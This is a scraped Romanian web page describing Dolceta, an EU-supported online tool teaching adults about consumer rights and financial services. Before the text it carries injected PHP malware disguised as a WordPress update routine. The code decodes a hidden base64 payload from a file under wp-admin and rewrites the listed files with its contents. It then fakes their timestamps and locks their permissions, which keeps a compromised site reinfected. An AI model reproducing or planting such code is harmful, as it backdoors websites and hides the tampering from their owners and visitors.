$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Dolceta – O noua atitudine

Dolceta

dolceta_horizontal1Dolceta?

Dolceta este acronimul pentru (Development of Online Consumer Education Tools for Adults) Dezvoltarea de Instrumente Online de Educare a Consumatorilor Adulţi.

Proiectul este susţinut de către Comisia Europeană şi este implementat în toate cele 27 de state membre ale UE.

Dolceta este un instrument interactiv de informare, îndrumare şi instruire a consumatorilor.

Website-ul oferă consumatorilor abilităţile necesare pentru a compara produsele şi serviciile de pe piaţă, pentru a decide în privinţa achiziţiilor pe care le fac şi pentru a-şi apăra drepturile legitime de care beneficiază în calitate de consumatori. Informaţiile legale şi practice sunt adaptate pentru caracteristicile naţionale ale fiecărei ţări.

Website-ul Dolceta

Website-ul nu are drept scop oferirea de informaţii exhaustive cu privire la toate domeniile legate de drepturile consumatorilor. Se centrează asupra întrebărilor frecvente şi asupra situaţilor problematice pentru consumatori în viaţa de zi cu zi. Răspunsurile la aceste întrebări sunt legale şi practice.

Explicaţiile cele mai teoretice sunt însoţite de exerciţii şi exemple, ce permit o mai bună înţelegere a informaţiilor oferite.

De asemenea, website-ul indică link-uri către alte website-uri, acestea fiind relevante pentru cine doreşte să îşi aprofundeze cunoştiinţele cu privire la o temă specifică sau pentru cine se confruntă cu o situaţie specifică.

Website-ul poate fi utilizat ca şi un instrument pedagocic pentru traineri şi profesori, veţi găsi mai multe informaţii accesând iconiţa „Ghidul Trainerului”.

Alcătuirea

Website-ul include două module:

Modulul 1 Drepturile Consumatorilor conţine 8 teme: Contracte de vânzare, Afişarea preţurilor, Vânzări la distanţă, Publicitate, Securitatea produselor şi serviciilor, Rezolvarea litigiilor, Piaţa unică, Probleme particulare.

Modulul 2 Servicii Financiare dezvoltă particularităţile serviciilor financiare pentru consumatori. Conţine 6 teme: Creditul de consum, Credite ipotecare, Administrarea contului bancar, Mijloace de plată, Economii & Investiţii .

Informaţiile din cadrul fiecărui modul sunt împarţite în trei niveluri, în funcţie de dificultate:

Nivelul 1: pentru informaţii de bază

Nivelul 2: pentru informaţii mai detaliate

Nivelul 3: pentru informaţii specializate

Posibilităţi

Website-ul permite accesul la un capitol în funcţie de temă, nivel sau motor de căutare (Modulul 1).

În timpul navigării puteţi merge înapoi prin intermediul meniului de navigare din partea stângă sau din partea superioară a paginii, acesta indiucând tema la care vă aflaţi.

Vocabularul vă oferă definiţii pentru principalele concepte utilizate în module.

Cunoaste-ti drepturile de consumator in Europa!

Siguranta!

Exercita-ti drepturile!

Suport educational

Exprima-ti nemultumirile!

Clipuri video: limba romana limba engleza
Decizia CNA de difuzare

Imagini de promovare: